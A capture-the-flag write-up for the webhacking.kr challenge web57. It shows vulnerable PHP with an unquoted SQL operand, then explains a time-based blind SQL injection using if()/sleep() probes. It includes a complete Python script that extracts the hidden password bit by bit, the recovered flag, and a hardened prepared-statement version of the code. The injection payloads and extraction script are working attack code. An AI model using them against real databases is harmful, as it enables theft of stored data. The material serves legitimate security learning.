Webhacking.kr - web57
```php
<?php
$db = dbconnect();
if($_GET['msg'] && isset($_GET['se'])){
  $_GET['msg'] = addslashes($_GET['msg']);
  $_GET['se'] = addslashes($_GET['se']);
  if(preg_match("/select|and|or|not|&|\||benchmark/i",$_GET['se'])) exit("Access Denied");
  mysqli_query($db,"insert into chall57(id,msg,pw,op) values('{$_SESSION['id']}','{$_GET['msg']}','{$flag}',{$_GET['se']})");
  echo "Done<br><br>";
  if(rand(0,100) == 1) mysqli_query($db,"delete from chall57");
}
?>
```
Solution
We need to extract the value of the pw column in the chall57 table.
The se value is placed into the query unquoted, so addslashes() does nothing to it, and the keyword blacklist does not cover if, sleep, length, substr or ascii. That makes a time-based blind SQL injection using the sleep function possible.
se=if(length(pw)>1,sleep(2),2) -> sleep(2) is executed
Working this way, the flag length comes out to 24.
Now we just need to recover the password value.
se=if(ascii(substr(pw,1,1))>48,sleep(1),1)
To be safe, I used 5 seconds.
```python
import requests
import time

url = 'https://webhacking.kr/challenge/web-34/'
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
cookies = {'PHPSESSID': '[redacted]'}
flag_bit = ''
flag = ''

# The flag is 24 characters long (found with the length(pw) probe above).
for i in range(1, 25):
    # First check whether the character's binary form is 6 or 7 bits long.
    payload = {'msg': 'hi', 'se': 'if(length(bin(ascii(substr(pw,' + str(i) + ',1))))=6,sleep(5),1)'}
    t1 = time.time()
    res = requests.get(url, params=payload, headers=headers, cookies=cookies)
    t2 = time.time()
    if t2 - t1 > 5:
        bitlen = 6
    else:
        bitlen = 7
    # Then read the character bit by bit: a delay means the bit is 0.
    for j in range(1, bitlen + 1):
        payload = {'msg': 'hi', 'se': 'if(substr(bin(ascii(substr(pw,' + str(i) + ',1))),' + str(j) + ',1)=0,sleep(5),1)'}
        t3 = time.time()
        res = requests.get(url, params=payload, cookies=cookies, headers=headers)
        t4 = time.time()
        if t4 - t3 > 5:
            flag_bit += '0'
        else:
            flag_bit += '1'
    flag += chr(int(flag_bit, 2))
    print("flag :", flag)
    flag_bit = ''
```
```text
flag : FLAG{y2u.be/kmPgjr0EL64}
```
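For comparison, a hardened version of the same insert, written here as an added example and not part of the challenge or this writeup: se is validated as an integer and every value is bound through a prepared statement, which removes the unquoted operand that the sleep() probes above rely on. dbconnect(), $flag and $_SESSION['id'] are assumed to exist exactly as in the original snippet.

```php
<?php
// Added example (not the challenge's code): the chall57 insert with the
// operand validated as an integer and all values bound as parameters.
// dbconnect(), $flag and $_SESSION['id'] are assumed to exist as in the
// original snippet.
$db = dbconnect();

if (isset($_GET['msg'], $_GET['se']) && $_GET['msg'] !== '') {
    // 'op' is an unquoted numeric column in the original query, so the
    // only acceptable input is an integer. Validate the type instead of
    // blacklisting keywords: if(...,sleep(5),1) contains none of the
    // blacklisted words and still executes.
    $se = filter_var($_GET['se'], FILTER_VALIDATE_INT);
    if ($se === false) {
        exit("Access Denied");
    }

    // Prepared statement: values never become part of the SQL text, so
    // addslashes() is unnecessary and the quoted/unquoted distinction the
    // original code got wrong no longer matters.
    $stmt = mysqli_prepare(
        $db,
        "INSERT INTO chall57(id, msg, pw, op) VALUES (?, ?, ?, ?)"
    );
    // "sssi": id, msg and pw are strings; op is bound as an integer.
    mysqli_stmt_bind_param($stmt, "sssi", $_SESSION['id'], $_GET['msg'], $flag, $se);
    mysqli_stmt_execute($stmt);
    mysqli_stmt_close($stmt);

    echo "Done<br><br>";
}
?>
```

With this version, a request such as se=if(length(pw)>1,sleep(2),2) is rejected before any query runs, and a plain se=2 is inserted as the number 2.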
This post is licensed under CC BY 4.0 by the author.